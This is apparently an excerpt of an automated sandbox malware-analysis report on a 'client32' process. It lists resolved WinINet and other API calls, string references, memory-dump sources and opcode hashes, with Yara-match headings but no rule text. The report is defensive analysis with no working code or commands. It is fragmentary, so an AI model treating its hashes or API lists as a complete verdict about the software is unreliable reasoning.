                                                                                                • Instruction ID: 4133adfa845279c2267cfda8ab6a139ff56e83a68c49f32f67e71b8829282469
                                                                                                • Opcode Fuzzy Hash: 2bc1dfb5218c02c431ab83e71b2dcb76f085101561c9e5be1cea2ac4dddf3c12
                                                                                                • Instruction Fuzzy Hash: E5119675740614AFE720DB68CC81FDAB7E8EF48704F004588F6089B280DBB1FA41CB95
                                                                                                APIs
                                                                                                • RegQueryValueExA.ADVAPI32 ref: 110ED600
                                                                                                  • Part of subcall function 110ED2B0: wvsprintfA.USER32(?,00020019,?), ref: 110ED2DB
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: QueryValuewvsprintf
                                                                                                • String ID: ($Error %d getting %s
                                                                                                • API String ID: 141982866-3697087921
                                                                                                • Opcode ID: ca51b0748ce67095b74e5d633593de675965d03fe984162ec59bedaca66226cf
                                                                                                • Instruction ID: 957b37bb43794c395efd3ecf64b5ca03ad7d4ce898e6801f907036c689cda8f8
                                                                                                • Opcode Fuzzy Hash: ca51b0748ce67095b74e5d633593de675965d03fe984162ec59bedaca66226cf
                                                                                                • Instruction Fuzzy Hash: BC11C672E01108AFDB10DEADDD45DEEB3BCEF99614F00816EF815D7244EA71A914CBA1
                                                                                                APIs
                                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 69CEC8A6
                                                                                                  • Part of subcall function 69D01960: std::exception::exception.LIBCMT ref: 69D01975
                                                                                                  • Part of subcall function 69D01960: __CxxThrowException@8.LIBCMT ref: 69D0198A
                                                                                                  • Part of subcall function 69D01960: std::exception::exception.LIBCMT ref: 69D0199B
                                                                                                • _memmove.LIBCMT ref: 69CEC8DF
                                                                                                Strings
                                                                                                • invalid string position, xrefs: 69CEC8A1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                                                                                • String ID: invalid string position
                                                                                                • API String ID: 1785806476-1799206989
                                                                                                • Opcode ID: e46e1f0d5a65b0dcbaa3841df005026d9afa0c5d27dc2f1e2c195512b04d8c2a
                                                                                                • Instruction ID: 98a468a14ac7264630e2b87be4513df587ca2d47ac07c80b138ecfbef8390043
                                                                                                • Opcode Fuzzy Hash: e46e1f0d5a65b0dcbaa3841df005026d9afa0c5d27dc2f1e2c195512b04d8c2a
                                                                                                • Instruction Fuzzy Hash: 1C0126327802085BD734CE6CFD8091ABBAAEBC5754B24493DE182CB704E771EC4183E1
                                                                                                APIs
                                                                                                Strings
                                                                                                • Error Code Sent to Tutor is %d, xrefs: 1110B575
                                                                                                • Error code %d not sent to Tutor, xrefs: 1110B5E8
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _memset
                                                                                                • String ID: Error Code Sent to Tutor is %d$Error code %d not sent to Tutor
                                                                                                • API String ID: 2102423945-1777407139
                                                                                                • Opcode ID: cb457852222b3d9b2bd104c4c917ff69952e9b88395c3a1b0ae6dfef815d539e
                                                                                                • Instruction ID: b43b366142eeca4acab724c68f0e90673ee899940c55183fb17260b92f7d2313
                                                                                                • Opcode Fuzzy Hash: cb457852222b3d9b2bd104c4c917ff69952e9b88395c3a1b0ae6dfef815d539e
                                                                                                • Instruction Fuzzy Hash: 0911A07AA4111CABDB10DFA4CD51FEAF77CEF55308F1041DAEA085B240DA72AA14CBA5
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: __strdup
                                                                                                • String ID: *this==pszSrc$NSMString.cpp
                                                                                                • API String ID: 838363481-1924475612
                                                                                                • Opcode ID: 6479b3d1f5a7fbda806bdfd950a5a25d8e5a290d607b1d9a972b9fa62fd7c344
                                                                                                • Instruction ID: 6a33640cede4faf6b707cf7972c9e0933d88709d190e4f47aec8dd68ec1eb503
                                                                                                • Opcode Fuzzy Hash: 6479b3d1f5a7fbda806bdfd950a5a25d8e5a290d607b1d9a972b9fa62fd7c344
                                                                                                • Instruction Fuzzy Hash: C6F028B1A003041BC200DF59B901A57FBA9CF9126CB04C03AFA9DC7B10F730D9078691
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: wvsprintf
                                                                                                • String ID: NSMString.cpp$pszBuffer[1024]==0
                                                                                                • API String ID: 2795597889-2173072673
                                                                                                • Opcode ID: 61b828c826f2100a472a8e541cb3607292fa53fd4a311f469147e17e2ec02848
                                                                                                • Instruction ID: 46a41861f5a6bf2e871fab6abf9b02d62b217234e8004c6922bd40c4a571d652
                                                                                                • Opcode Fuzzy Hash: 61b828c826f2100a472a8e541cb3607292fa53fd4a311f469147e17e2ec02848
                                                                                                • Instruction Fuzzy Hash: 30F0A9B5A001086BDF44DF54DD14AEEB7B89F45618F4080A9EB49A7240EB305E4A87A5
                                                                                                APIs
                                                                                                • wvsprintfA.USER32(?,?,00000000), ref: 110D1572
                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorExitLastMessageProcesswsprintfwvsprintf
                                                                                                • String ID: ..\CTL32\NSMString.cpp$pszBuffer[1024]==0
                                                                                                • API String ID: 175691280-2052047905
                                                                                                • Opcode ID: 7c0d153cab71b8fe9f1bfbcba2addb4273ace9702d0da0492f16544c7bd503bd
                                                                                                • Instruction ID: b89aa90761fb3a94205c41d70d04c41302f16292cd1454487622bd2b1eadc16a
                                                                                                • Opcode Fuzzy Hash: 7c0d153cab71b8fe9f1bfbcba2addb4273ace9702d0da0492f16544c7bd503bd
                                                                                                • Instruction Fuzzy Hash: 0EF0A975A0025DABCF00DEE4DC40BFEFBAC9B85208F40419DF945A7240DE706A45C7A5
                                                                                                APIs
                                                                                                • GetProcAddress.KERNEL32(?,InternetConnectA), ref: 69CE4C84
                                                                                                • SetLastError.KERNEL32(00000078), ref: 69CE4CBD
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AddressErrorLastProc
                                                                                                • String ID: InternetConnectA
                                                                                                • API String ID: 199729137-3259999732
                                                                                                APIs
                                                                                                • GetProcAddress.KERNEL32(?,HttpOpenRequestA), ref: 69CE4E34
                                                                                                • SetLastError.KERNEL32(00000078), ref: 69CE4E6D
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AddressErrorLastProc
                                                                                                • String ID: HttpOpenRequestA
                                                                                                • API String ID: 199729137-1149044843
                                                                                                APIs
                                                                                                • SendMessageA.USER32(00000000,00001006,00000000,?), ref: 1101509D
                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                Strings
                                                                                                • e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h, xrefs: 11015044
                                                                                                • m_hWnd, xrefs: 11015049
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                                                • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h$m_hWnd
                                                                                                • API String ID: 819365019-3966830984
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: wvsprintf
                                                                                                • String ID: NSMString.cpp$pszBuffer[1024]==0
                                                                                                • API String ID: 2795597889-2173072673
                                                                                                APIs
                                                                                                • wvsprintfA.USER32(?,?,1102CC61), ref: 110D15EB
                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorExitLastMessageProcesswsprintfwvsprintf
                                                                                                • String ID: ..\CTL32\NSMString.cpp$pszBuffer[1024]==0
                                                                                                • API String ID: 175691280-2052047905
                                                                                                APIs
                                                                                                  • Part of subcall function 69D03B5E: __getptd.LIBCMT ref: 69D03B64
                                                                                                  • Part of subcall function 69D03B5E: __getptd.LIBCMT ref: 69D03B74
                                                                                                • __getptd.LIBCMT ref: 69D0A979
                                                                                                  • Part of subcall function 69D06F64: __getptd_noexit.LIBCMT ref: 69D06F67
                                                                                                  • Part of subcall function 69D06F64: __amsg_exit.LIBCMT ref: 69D06F74
                                                                                                • __getptd.LIBCMT ref: 69D0A987
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                                • String ID: csm
                                                                                                • API String ID: 803148776-1018135373
                                                                                                APIs
                                                                                                • GetProcAddress.KERNEL32(?,InternetOpenA), ref: 69CE4B04
                                                                                                • SetLastError.KERNEL32(00000078), ref: 69CE4B31
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AddressErrorLastProc
                                                                                                • String ID: InternetOpenA
                                                                                                • API String ID: 199729137-3658917949
                                                                                                APIs
                                                                                                • GetProcAddress.KERNEL32(00000000,InternetErrorDlg,?,?,69CEB4D8,00000000), ref: 69CE4CE4
                                                                                                • SetLastError.KERNEL32(00000078,?,?,69CEB4D8,00000000), ref: 69CE4D11
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AddressErrorLastProc
                                                                                                • String ID: InternetErrorDlg
                                                                                                • API String ID: 199729137-3951532234
                                                                                                APIs
                                                                                                • GetProcAddress.KERNEL32(00000000,HttpSendRequestExA,00000000,?,69CEB614), ref: 69CE4F34
                                                                                                • SetLastError.KERNEL32(00000078,00000000,?,69CEB614), ref: 69CE4F61
                                                                                                Strings
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AddressErrorLastProc
                                                                                                • String ID: HttpSendRequestExA
                                                                                                • API String ID: 199729137-1584202490
                                                                                                APIs
                                                                                                • GetProcAddress.KERNEL32(00000000,HttpSendRequestA,00000000,?,69CEB3E2,00000000,00000000,00000000,00000000,00000000), ref: 69CE4EE4
                                                                                                • SetLastError.KERNEL32(00000078,00000000,?,69CEB3E2,00000000,00000000,00000000,00000000,00000000), ref: 69CE4F11
                                                                                                Strings
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AddressErrorLastProc
                                                                                                • String ID: HttpSendRequestA
                                                                                                • API String ID: 199729137-4278235638
                                                                                                APIs
                                                                                                • GetProcAddress.KERNEL32(00000000,HttpQueryInfoA,00000000,?,69CEB421), ref: 69CE4E94
                                                                                                • SetLastError.KERNEL32(00000078,00000000,?,69CEB421,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 69CE4EC1
                                                                                                Strings
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AddressErrorLastProc
                                                                                                • String ID: HttpQueryInfoA
                                                                                                • API String ID: 199729137-45432230
                                                                                                APIs
                                                                                                • _memset.LIBCMT ref: 69CF6FDE
                                                                                                • ctl_pittmanfunc.HTCTL32(?,00000001,?,00000050,?,00000004,00000000,00000000,?,00000000,00000050), ref: 69CF7018
                                                                                                  • Part of subcall function 69CF62B0: _memset.LIBCMT ref: 69CF62F6
                                                                                                  • Part of subcall function 69CF62B0: SetLastError.KERNEL32(00000057), ref: 69CF65A3
                                                                                                Strings
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _memset$ErrorLastctl_pittmanfunc
                                                                                                • String ID: P
                                                                                                • API String ID: 2926529296-3110715001
                                                                                                APIs
                                                                                                • GetProcAddress.KERNEL32(?,InternetReadFile), ref: 69CE4BF4
                                                                                                • SetLastError.KERNEL32(00000078), ref: 69CE4C1D
                                                                                                Strings
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AddressErrorLastProc
                                                                                                • String ID: InternetReadFile
                                                                                                • API String ID: 199729137-1824561397
                                                                                                APIs
                                                                                                • GetProcAddress.KERNEL32(?,InternetQueryOptionA,000000C8,?,69CEB53C,00000000,0000002B,?,?), ref: 69CE4BA4
                                                                                                • SetLastError.KERNEL32(00000078,000000C8,?,69CEB53C,00000000,0000002B,?,?), ref: 69CE4BCD
                                                                                                Strings
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AddressErrorLastProc
                                                                                                • String ID: InternetQueryOptionA
                                                                                                • API String ID: 199729137-3310327128
                                                                                                APIs
                                                                                                • GetProcAddress.KERNEL32(?,InternetQueryDataAvailable), ref: 69CE4B54
                                                                                                • SetLastError.KERNEL32(00000078), ref: 69CE4B7D
                                                                                                Strings
                                                                                                • InternetQueryDataAvailable, xrefs: 69CE4B4E
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AddressErrorLastProc
                                                                                                • String ID: InternetQueryDataAvailable
                                                                                                • API String ID: 199729137-452555236
                                                                                                APIs
                                                                                                • GetProcAddress.KERNEL32(?,InternetWriteFile,?,?,69CE9BCE,?,?,?,?), ref: 69CE4DE4
                                                                                                • SetLastError.KERNEL32(00000078,?,?,69CE9BCE,?,?,?,?), ref: 69CE4E0D
                                                                                                Strings
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AddressErrorLastProc
                                                                                                • String ID: InternetWriteFile
                                                                                                • API String ID: 199729137-2273844942
                                                                                                APIs
                                                                                                • GetProcAddress.KERNEL32(?,InternetSetOptionA,00000000,?,69CEB392,00000000,0000002B,?,?), ref: 69CE4D44
                                                                                                • SetLastError.KERNEL32(00000078,00000000,?,69CEB392,00000000,0000002B,?,?), ref: 69CE4D6D
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AddressErrorLastProc
                                                                                                • String ID: InternetSetOptionA
                                                                                                • API String ID: 199729137-1247460590
                                                                                                • Opcode ID: 60167e8d4104d2d7cc40486a1593afff5ca150394ca596fcabe5114e222b7c70
                                                                                                • Instruction ID: d573c6e7754132e24a9fae76191b96ad1f6871fdccab512ad912781f390593fb
                                                                                                • Opcode Fuzzy Hash: 60167e8d4104d2d7cc40486a1593afff5ca150394ca596fcabe5114e222b7c70
                                                                                                • Instruction Fuzzy Hash: 93F01276A04628AFE720DF94D944F5777A8EB48B61F00442AFA5AD7640D671E810CBA0
                                                                                                APIs
                                                                                                • SetPropA.USER32(?,?,?), ref: 1115F395
                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorExitLastMessageProcessPropwsprintf
                                                                                                • String ID: ..\ctl32\wndclass.cpp$p->m_hWnd
                                                                                                • API String ID: 1134434899-3115850912
                                                                                                • Opcode ID: 538790263cfb1f25c099da663b992418a3413831744957c6e7e8603356e21433
                                                                                                • Instruction ID: 87c86bef28f98f72f88127ca4e69caffea3bfce03f9a6da2004c13aaf4101256
                                                                                                • Opcode Fuzzy Hash: 538790263cfb1f25c099da663b992418a3413831744957c6e7e8603356e21433
                                                                                                • Instruction Fuzzy Hash: FCF0E575BC0336B7D7509A66DC82FE6F358D722BA4F448016FC26A2141F274E980C2D2
                                                                                                APIs
                                                                                                • SendMessageA.USER32(00000000,0000102D,00000000,?), ref: 11015229
                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                Strings
                                                                                                • e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h, xrefs: 110151F4
                                                                                                • m_hWnd, xrefs: 110151F9
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                                                • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h$m_hWnd
                                                                                                • API String ID: 819365019-3966830984
                                                                                                • Opcode ID: bd39cd011623ecfe06393bf57d51be560d8a4fd4800ff0bf8f32089dc2d64717
                                                                                                • Instruction ID: 9699e87d833f238af44183ea9879e136ee952ee53a84507d201ef9d6a93955d8
                                                                                                • Opcode Fuzzy Hash: bd39cd011623ecfe06393bf57d51be560d8a4fd4800ff0bf8f32089dc2d64717
                                                                                                • Instruction Fuzzy Hash: 19F0FEB5D0025DABCB14DF95DC85EDAB7F8EB4D310F00852AFD29A7240E770A950CBA5
                                                                                                APIs
                                                                                                • GetProcAddress.KERNEL32(?,QueueUserWorkItem), ref: 110173E4
                                                                                                • SetLastError.KERNEL32(00000078), ref: 11017409
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AddressErrorLastProc
                                                                                                • String ID: QueueUserWorkItem
                                                                                                • API String ID: 199729137-2469634949
                                                                                                • Opcode ID: 0f94a6c9280d95f6267a0057a90355b84bcc2892604fd1d5b79f284ec07f3bb7
                                                                                                • Instruction ID: 14daf5f2905bb7c6da6366d36066c9679ffc6904d36036c61edd8dc8337596d2
                                                                                                • Opcode Fuzzy Hash: 0f94a6c9280d95f6267a0057a90355b84bcc2892604fd1d5b79f284ec07f3bb7
                                                                                                • Instruction Fuzzy Hash: 06F01C72A50628AFD714DFA4D948E9BB7E8FB54721F00852AFD5597A04C774F840CBA0
                                                                                                APIs
                                                                                                • GetProcAddress.KERNEL32(00000000,InternetSetStatusCallback,02EF2D2C,?,69CEB267,00000000,69CE6BD0), ref: 69CE4D94
                                                                                                • SetLastError.KERNEL32(00000078,02EF2D2C,?,69CEB267,00000000,69CE6BD0), ref: 69CE4DB5
                                                                                                Strings
                                                                                                • InternetSetStatusCallback, xrefs: 69CE4D8E
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AddressErrorLastProc
                                                                                                • String ID: InternetSetStatusCallback
                                                                                                • API String ID: 199729137-894424467
                                                                                                • Opcode ID: 101f9b17951dbe0a5912fa923df1c030403ff046db57c5b22992f07934b20001
                                                                                                • Instruction ID: d2d8f926d5f26d4bc3461f1b4ff9b599c25c52b69073cc9961906ee00340cbb3
                                                                                                • Opcode Fuzzy Hash: 101f9b17951dbe0a5912fa923df1c030403ff046db57c5b22992f07934b20001
                                                                                                • Instruction Fuzzy Hash: 31E065729447246FE7209F98D948F56B7B8FB44761F00842AEA45D7600D671E844DBD0
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: NameName::
                                                                                                • String ID: {flat}
                                                                                                • API String ID: 1333004437-2606204563
                                                                                                • Opcode ID: 2fa21fe01e1db8db7f1dca36ea764a104a4f3154e86d7d3a712d910af6e6bd06
                                                                                                • Instruction ID: 403841f077dc9c132986b6080a6d94970cd9e5a369f9bf6dc416116395e01825
                                                                                                • Opcode Fuzzy Hash: 2fa21fe01e1db8db7f1dca36ea764a104a4f3154e86d7d3a712d910af6e6bd06
                                                                                                • Instruction Fuzzy Hash: A3F06536188248DFDB01CF58E554FA53BA5AB4275AF04C0A1E64C0F662C732D482C7A1
                                                                                                APIs
                                                                                                • _malloc.LIBCMT ref: 69CFDC59
                                                                                                  • Part of subcall function 69D01B69: __FF_MSGBANNER.LIBCMT ref: 69D01B82
                                                                                                  • Part of subcall function 69D01B69: __NMSG_WRITE.LIBCMT ref: 69D01B89
                                                                                                  • Part of subcall function 69D01B69: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,69D0D3C1,69D06E81,00000001,69D06E81,?,69D0F447,00000018,69D27738,0000000C,69D0F4D7), ref: 69D01BAE
                                                                                                • _memset.LIBCMT ref: 69CFDC82
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AllocateHeap_malloc_memset
                                                                                                • String ID: Refcount.cpp
                                                                                                • API String ID: 2365696598-3480236496
                                                                                                • Opcode ID: c43326d0b8202ac3a7b5ae9413673bfbe213edf8bd9c45c4659f89d3b6585c4d
                                                                                                • Instruction ID: a4728c51bcc36c5f2d3b4f2d77366d4c0f0257278cffa850d4b29bdd9552be87
                                                                                                • Opcode Fuzzy Hash: c43326d0b8202ac3a7b5ae9413673bfbe213edf8bd9c45c4659f89d3b6585c4d
                                                                                                • Instruction Fuzzy Hash: 03E0C26BA4012437C21152963D03F8FFA5C4F92EADF050032FF0CA6641F795A95541E6
                                                                                                APIs
                                                                                                • GetProcAddress.KERNEL32(?,InternetCloseHandle,00000000,?,69CEB677,?), ref: 69CE4C44
                                                                                                • SetLastError.KERNEL32(00000078,00000000,?,69CEB677,?), ref: 69CE4C61
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AddressErrorLastProc
                                                                                                • String ID: InternetCloseHandle
                                                                                                • API String ID: 199729137-3843628324
                                                                                                • Opcode ID: cd7f814751ae90c8858e1e7fb9bbc859e327a47a8abefc644d170de6364ed5df
                                                                                                • Instruction ID: 7732d8336e96980fca92b5ca27887fe7f419ad84a3d59075acb5a2ea9f4b4313
                                                                                                • Opcode Fuzzy Hash: cd7f814751ae90c8858e1e7fb9bbc859e327a47a8abefc644d170de6364ed5df
                                                                                                • Instruction Fuzzy Hash: FCE0D8729007249FD320DFA4D904F46B7F8EF24765F00453AE645D7501D670E484CBD0
                                                                                                APIs
                                                                                                • GetProcAddress.KERNEL32(?,FlashWindowEx), ref: 1101D334
                                                                                                • SetLastError.KERNEL32(00000078), ref: 1101D351
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmp
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmp
